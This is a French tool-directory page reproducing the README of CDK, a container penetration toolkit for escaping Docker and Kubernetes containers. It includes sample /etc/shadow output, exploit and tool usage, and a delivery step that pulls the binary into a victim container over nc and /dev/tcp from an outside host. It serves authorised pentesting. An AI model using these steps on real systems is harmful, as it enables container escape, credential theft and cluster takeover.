Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CDK — 📦 Facilitez les tests de sécurité de K8s, Docker et Containerd. | Kitploit
Outils/GitHubGitHub/cdk-team/cdk
Escalade de PrivilègesReconnaissanceSécurité des ConteneursMécanismes de PersistanceExploitationMouvement LatéralPost-ExploitationTests d'IntrusionSécurité CloudÉvasion de ConteneurTop en Évasion de Conteneur n°2
4.7k60665il y a 5 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHubcdk-team/cdk

CDK

📦 Facilitez les tests de sécurité de K8s, Docker et Containerd.

Voir le dépôtSite web

CDK - Kit de pénétration de conteneurs sans dépendance

Anglais | 简体中文

png

Avis de non-responsabilité légal

L'utilisation de CDK pour attaquer des cibles sans consentement mutuel préalable est illégale. CDK est destiné uniquement à des fins de tests de sécurité.

Aperçu

CDK est un toolkit de pénétration de conteneurs open-source, conçu pour offrir une exploitation stable dans différents conteneurs allégés sans aucune dépendance au système d'exploitation. Il est fourni avec des outils réseau utiles et de nombreux PoCs/EXPs puissants et vous aide à vous échapper du conteneur et à prendre le contrôle du cluster K8s facilement.

Démarrage rapide

Exécutez cdk eva pour obtenir des informations d'évaluation et une exploit recommandée, puis exécutez cdk run pour lancer l'attaque.

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Livraison

Téléchargez la dernière version sur https://github.com/cdk-team/CDK/releases/

Déposez les fichiers exécutables dans le conteneur cible et commencez les tests.

ASTUCES : Livrer CDK dans le conteneur cible lors de tests de pénétration réels

Si vous avez une exploit qui peut téléverser un fichier, vous pouvez alors téléverser le binaire CDK directement.

Si vous avez une RCE exploit, mais que le conteneur cible n'a ni curl ni wget, vous pouvez utiliser la méthode suivante pour livrer CDK :

  1. D'abord, hébergez le binaire CDK sur votre hôte avec une IP publique.
(sur votre hôte)
nc -lvp 999 < cdk
  1. Dans le conteneur victime, exécutez
cat < /dev/tcp/(votre_ip_hote_publique)/(port) > cdk
chmod a+x cdk

Utilisation

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Collecte des informations pour trouver des failles dans le conteneur.
  cdk evaluate --full                       Active l'analyse des fichiers lors de la collecte d'informations.

Exploit:
  cdk run --list                            Liste toutes les exploits disponibles.
  cdk run <exploit> [<args>...]             Exécute une exploit unique, documentation sur https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Modifie les fichiers dans le conteneur comme la commande "vi".
  ps                                        Affiche les informations sur les processus comme la commande "ps -ef".
  nc [options]                              Crée un tunnel TCP.
  ifconfig                                  Affiche les informations réseau.
  kcurl <path> (get|post) <uri> <data>      Effectue une requête au K8s api-server.
  ectl <endpoint> get <key>                 Énumération non autorisée des clés etcd.
  ucurl (get|post) <socket> <uri> <data>    Effectue une requête au socket Unix docker.
  probe <ip> <port> <parallel> <timeout-ms> Scan de port TCP, exemple : cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Affiche ce message d'aide.
  -v --version  Affiche la version.
  --profile=<name> Sélectionne le profil d'évaluation.

Fonctionnalités

CDK dispose de trois modules :

  1. Évaluation : collecte des informations à l'intérieur du conteneur pour trouver des faiblesses potentielles.
  2. Exploit : pour l'évasion de conteneur, la persistance et le mouvement latéral.
  3. Outil : outils réseau et API pour les requêtes TCP/HTTP, les tunnels et la gestion de cluster K8s.

Module d'évaluation

Utilisation

cdk evaluate [--full]
TactiquesScriptSupportéUtilisation/Exemple
Collecte d'informationsInfos de base OS✔lien
Collecte d'informationsCapacités disponibles✔lien
Collecte d'informationsCommandes Linux disponibles✔lien
Collecte d'informationsPoints de montage✔lien
Collecte d'informationsEspace de noms réseau✔lien
Collecte d'informationsENV sensibles✔lien
Collecte d'informationsProcessus sensibles✔lien
Collecte d'informationsFichiers locaux sensibles✔lien
Collecte d'informationsKube-proxy Route Localnet(CVE-2020-8558)✔lien
Collecte d'informationsDécouverte de services basée sur DNS✔lien
DécouverteInfos K8s Api-server✔lien
DécouverteInfos K8s Service-account✔lien
DécouverteAPI Metadata du fournisseur Cloud✔lien

Module d'exploit

Liste toutes les exploits disponibles :

cdk run --list

Exécute une exploit ciblée :

cdk run <nom-script> [options]
Télécharger l’outil